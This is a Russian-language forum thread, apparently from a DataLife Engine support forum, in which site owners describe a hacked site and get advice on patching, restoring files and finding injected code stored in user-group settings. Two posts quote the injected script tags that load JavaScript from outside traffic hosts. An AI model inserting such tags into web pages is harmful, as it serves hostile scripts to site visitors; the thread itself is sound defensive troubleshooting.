Перейти к публикации

Взломали сайт


Рекомендованные сообщения

Сегодня при заходе на свой сайт обнаруживаю всплывающее окно.

В кеще страниц вижу многократно прописанный код типа:

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script><table>

Защита от шеллов прописана. Что можно сделать?

Обыскал все файлы, нет изменений, удаляю кеш страниц, генерится новый, опять со скриптами :(

Ссылка на сообщение
Поделиться на других сайтах

Смотрите темы:

http://forum.dle-news.ru/index.php?showtopic=53254

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

также удаляйте сторонние скрипты со своего сервера, у вас их там много.

Более того на сайте не установлены патчи безопасности, вышедшие еще несколько месяцев назад http://dle-news.ru/bags/ в частности http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

Ставьте патчи, восстанавливайте оригинальные файлы скрипта, проверяйте и удаляйте лишних администраторов, проверяйте раздел управления рекламой в админпанели.

Ссылку на ваш сайт удалил, т.к. он уязвим.

Ссылка на сообщение
Поделиться на других сайтах

этот поставил сразу как он вышел http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html :(

предыдущие багфиксы, да, пропустил

администратор всего один, скриптов два, оба платные, раздел рекламы почистил сразу же

рою дальше, заметил особенность - в кеше эти поганые урлы появляются только при первой генерации, как только добавишь коммент или новость, файл кеша обновляется, и урлов уже нет. Это может о чем то говорить?

Ссылка на сообщение
Поделиться на других сайтах

этот поставил сразу как он вышел http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

Ничего у вас не стоит, я проверял ваш сайт полчаса назад, когда смотрел ваш сайт и этот патч установлен не был. Поэтому как вы его устанавливали я не знаю

рою дальше, заметил особенность - в кеше эти поганые урлы появляются только при первой генерации, как только добавишь коммент или новость, файл кеша обновляется, и урлов уже нет. Это может о чем то говорить?

смотрите кстати настройки групп, код мог быть прописан в префикс у группы.

скриптов два, оба платные,

это ничего не значит

Ссылка на сообщение
Поделиться на других сайтах

Патч установлен был, 24.09, ну не в этом дело. Спасибо за поддержку.

Я правильно полагаю, что на сервере должны быть файлы с измененной датой, если менялись через шелл, верно?

Ссылка на сообщение
Поделиться на других сайтах

Патч установлен был, 24.09, ну не в этом дело. Спасибо за поддержку.

Как не в этом? Еще как в этом. Вы поймите, я не строю предположения ставили ли вы патч или нет, я захожу на ваш сайт и проверяю, подвержен он уязвимости или нет. Так вот ваш сайт подвержен, т.е. патч не стоит 100%, и вам не спорить нужно, а срочно ставить патч. Я вот даже сейчас проверил еще раз, и ничего на данный момент у вас не стоит. Ставьте патч незамедлительно иначе все ваши действия ничем вам не помогут.

Я правильно полагаю, что на сервере должны быть файлы с измененной датой, если менялись через шелл, верно?

необязательно, этот js код мог быть вставлен в настройки групп и хранится теперь в БД а не в файлах. Датами файлов можно легко управлять через шелл, поэтому на изменения даты даже не смотрите, она может не меняться.

Ссылка на сообщение
Поделиться на других сайтах

Не спорю, патч скачал, установил.

этот js код мог быть вставлен в настройки групп и хранится теперь в БД а не в файлах
нашелся! и действительно вставлен в настройки групп!
Ссылка на сообщение
Поделиться на других сайтах

Не спорю, патч скачал, установил.

теперь у вас поиск не работает. Читайте внимательно в новости

Либо просто скачайте и скопируйте на свой сервер патч для версии 9.0: http://dle-news.ru/files/dle90_path.zip, изменения для более старых версий скрипта, вносятся вручную, как указано выше.

у вас же не версия 9.0, вам вручную нужно вносить изменения в файлы, которые указаны в данной новости, а не копировать файлы от 9.0

Восстановите опять оригинальные файлы от вашей версии скрипта, и вносите изменения в файлы вручную как указано.

Ссылка на сообщение
Поделиться на других сайтах

да, невнимательность подвела, редактировал только fullsearch, про search забыл. Ну чтоже, огромный респект вам, большое спасибо!

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script><table>

У меня такая же хрень - теперь буду во время обновляться!

Вдобавок нашёл у себя в папке с софтом, который вручную заливал (эту папку антивирус DLE не сканил) - порядка 1000 страниц-дорвеев на всякие поиски-по-базам.ру фамилий людей и тд. Так что народ ищите сюрпризы во всех папках, которые не сканирует антивирус DLE!

Вот еще мне помогает проверка сайта на вирусы на 2ip.ru - может тоже кому пригодится.

И у меня вопрос по обновлению движка версии 7.3.

Летом мне переносили сайт на другой сервер - и с тех пор у одного сайта почему-то нельзя в почти всех папках удалять/переименовывать файлы, менять им права и тд. В принципе всё работает, меня пока всё устраивает, просто не хочу дёргать хостера...

Но из-за этого нельзя пропатчить движок, закрыв уязвимости. Скажите пожалуйста - такой глюк фтп автоматически защищает от взлома непропатченного движка (ведь если даже я на фтп не могу ничего сделать с файлами - то по идее и злоумышленники не смогут) или нет?

Ссылка на сообщение
Поделиться на других сайтах

Скажите пожалуйста - такой глюк фтп автоматически защищает от взлома непропатченного движка (ведь если даже я на фтп не могу ничего сделать с файлами - то по идее и злоумышленники не смогут) или нет?

Нет, все зависит от причин. У пользователя FTP прав может и не быть, а у веб быть, опять таки патчи безопасности предотврящают попадание злоумышленника в базу данных.

Ссылка на сообщение
Поделиться на других сайтах

У кого на сервере ProFTPD стоит, тоже очень актуально. Много людей пострадало за последнее время.

http://www.opennet.ru/opennews/art.shtml?num=28866

http://www.opennet.ru/opennews/art.shtml?num=28476

Ссылка на сообщение
Поделиться на других сайтах
  • 3 недели спустя...

Братцы! Ломанули сайт лицуха _http://kurdistan-post.ru, залили шел во все папки с правами 777, что делать? Пока поменял все на 755, будет ли движок с такими правами функционировать? Как оберечься от дальнейших вредных действий!?

Ссылка на сообщение
Поделиться на других сайтах

fortune7,

Первое что нужно сделать, это удалить все посторонние модификации и скрипты с сервера, восстановить оригинальные файлы на сервере из архива дистрибутива.

Также проверить что на вашем сервере установлена актуальная версия phpMyAdmin, и если это не так, то обновить до актуальной версии. Послее время шеллы заливают через него, т.к. в нем обнаружена серьезная уязвимость.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...